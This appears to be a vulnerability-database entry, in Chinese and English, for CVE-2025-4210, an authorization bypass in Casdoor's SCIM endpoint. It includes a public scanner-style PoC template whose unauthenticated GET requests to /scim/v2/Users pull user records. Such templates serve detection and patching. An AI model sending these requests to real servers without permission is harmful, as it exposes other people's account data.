漏洞描述
Casdoor up to 1.811.0 contains an authorization bypass caused by manipulation in HandleScim function in controllers/scim.go, letting remote attackers bypass authorization, exploit requires remote access.
CVE-2025-4210: Casdoor - Authorization Bypass
PoC代码[已公开]
id: CVE-2025-4210
info:
name: Casdoor - Authorization Bypass
author: theamanrawat
severity: high
description: |
Casdoor up to 1.811.0 contains an authorization bypass caused by manipulation in HandleScim function in controllers/scim.go, letting remote attackers bypass authorization, exploit requires remote access.
impact: |
Attackers can bypass authorization, potentially gaining unauthorized access to sensitive data or functionalities.
remediation: |
Upgrade to version 1.812.0.
reference:
- https://github.com/casdoor/casdoor/commit/3d12ac8dc2282369296c3386815c00a06c6a92fe
- https://nvd.nist.gov/vuln/detail/CVE-2025-4210
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
cvss-score: 7.3
cve-id: CVE-2025-4210
epss-score: 0.00058
epss-percentile: 0.18529
cwe-id: CWE-285
metadata:
verified: true
max-requests: 2
vendor: casdoor
product: casdoor
tags: cve.cve2025,casdoor,scim,auth-bypass,disclosure,vkev
http:
- method: GET
path:
- "{{BaseURL}}/scim/v2/Users"
- "{{BaseURL}}/api/scim/v2/Users"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "schemas"
- "totalResults"
- "Resources"
- "givenName"
condition: and
- type: word
part: header
words:
- "application/scim+json"
- "application/json"
condition: or
- type: status
status:
- 200
# digest: 4a0a0047304502201533016caa649d288611a02cdfbbf4fc4d6f474d3871f5a87ca366a314a7be14022100958c3bc7f7020b141dd3dc0ea097f7729b9b735e13b6a21885d4031649055501:922c64590222798bb761d5b6d8e72950